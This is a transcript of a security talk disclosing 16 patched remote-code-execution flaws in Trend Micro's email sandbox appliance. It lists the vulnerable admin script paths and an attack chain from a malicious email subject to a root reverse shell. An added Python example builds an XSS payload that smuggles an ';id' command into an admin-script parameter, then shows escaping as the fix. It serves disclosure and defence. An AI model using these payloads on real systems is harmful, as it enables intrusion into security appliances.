Exploiting e-mail sandbox
Presentation transcript:

Slide1

Exploiting e-mail sandbox

backdoor it with one evil e-mail

Nikolay Klendar, bsploit@gmail.com

Slide2

Who am I

- Head of IT Security
- Offensive Security Certified Expert
- Not a bug hunter
- Hobbies: programming, kitesurfing, snowboarding

Slide3

DDEI (Trend Micro Deep Discovery Email Inspector) implementation scheme

Access to the Web UI could be restricted, for example to the management network

Slide4

Source Code Analysis

Slide5

WhiteBox Analysis. Admin UI RCE

Conditions:
- No authentication required
- No CSRF protection

Slide6

Multiple RCEs

/hidden/firewall_setting/firewall_setting.php
/hidden/db_export/db_export.php
/hidden/network_dump/php/network_dump.php
/hidden/kdump/php/kdump_setting.php
/hidden/url_extract/url_extract.php
/hidden/url_filter/url_filter.php
/hidden/postfix_setting/postfix_setting.php
/admin/php/network_setting.php
/report/report_ui/php/report_setting.php
/usandbox/import_native_sandbox.php
/php/screenshot.php
/php/syslog_setting.php
/detections/download_pdf.php
/detections/write_new_html_with_svg.php
get_filesize.php
ajax_checklicense_AC.php

(16 scripts in total; the last seven paths are reproduced as they survive in the transcript and are missing their leading directories)

Slide7

Potential vectors of compromise

- Direct request from the management network
- Place <img src="https://ddei/vuln_script.php"> on your own site and wait for an admin to visit it
- Something more interesting?

Slide8

GrayBox Analysis. HTML injection

Slide9

Possible attack scenario

1. Attacker: creates an email with malicious content (link or attachment) and puts the exploit into the subject
2. Admin: opens Dashboards -> Trends tab. The exploit runs without additional user interaction
3. Reverse shell from the sandbox to the attacker's C&C => full compromise with root privileges
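The chain above works because the Subject header is attacker-controlled data that the appliance later renders in the admin's browser, on the appliance's own origin. Script injected there can call the unauthenticated admin scripts from the earlier slide without any cross-site trick. The following Python example is added here and is not code from the talk or from Trend Micro: it builds a mail with a payload in the subject, shows that RFC 2047 encoding of the header does not neutralize it, and contrasts a dashboard row that interpolates the decoded subject with a blacklist "fix" and with proper output encoding. The Trends-table layout, the helper names and the 'host' parameter are assumptions; the path is the placeholder vuln_script.php from the vectors slide.

```python
import email
import email.policy
import html
from email.message import EmailMessage

# Constructed payload (not from the talk). Running in the admin's browser on the
# appliance origin, it simply requests an admin script; no CSRF bypass is needed.
PAYLOAD = '<img src=x onerror="new Image().src=\'/vuln_script.php?host=x;id\'">'
# A non-ASCII prefix forces the Subject header to be sent as RFC 2047 encoded words.
SUBJECT = "Счёт " + PAYLOAD


def build_mail(subject):
    """Attacker side: an ordinary mail; the email library encodes and folds the
    Subject header the way a mail client would."""
    msg = EmailMessage()
    msg["From"] = "attacker@example.net"
    msg["To"] = "victim@example.com"
    msg["Subject"] = subject
    msg.set_content("Please see the attached invoice.")
    return msg.as_bytes()


def decoded_subject(raw):
    """Gateway side: parse the mail and decode the Subject header back to text,
    which is what a dashboard displays. Encoded words hide nothing from it."""
    msg = email.message_from_bytes(raw, policy=email.policy.default)
    return str(msg["Subject"])


def render_row_vulnerable(subject):
    """Trends-table row that interpolates the decoded subject into HTML as-is."""
    return "<tr><td>" + subject + "</td></tr>"


def render_row_blacklist(subject):
    """A common wrong fix: strip <script> tags only; event handlers still fire."""
    cleaned = subject.replace("<script", "").replace("</script>", "")
    return "<tr><td>" + cleaned + "</td></tr>"


def render_row_hardened(subject):
    """Context-aware output encoding: the subject is always data, never markup."""
    return "<tr><td>" + html.escape(subject, quote=True) + "</td></tr>"


if __name__ == "__main__":
    raw = build_mail(SUBJECT)
    print(raw.decode("ascii", "replace"))   # Subject travels as =?utf-8?...?= encoded words
    shown = decoded_subject(raw)
    print(render_row_vulnerable(shown))
    print(render_row_blacklist(shown))
    print(render_row_hardened(shown))
```

html.escape covers the HTML text and attribute contexts used here; a subject placed into a JavaScript string, a URL or a CSS value needs the encoder for that context instead. Output encoding on the dashboard side is the fix that survives whatever the sender puts in the header; filtering on the way in does not.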

Slide10

Connecting Sandbox to C&C

Slide11

Critical Patch

https://success.trendmicro.com/solution/1116750-security-bulletin-multiple-vulnerabilities-in-trend-micro-deep-discovery-email-inspector-ddei-2-5

Slide12

Conclusion

- 16 RCEs with CVSS 10 were reported and confirmed by the vendor
- Harden even security systems
- Implement source code analysis in the SDLC

Join the HCFB security team: bsploit@gmail.com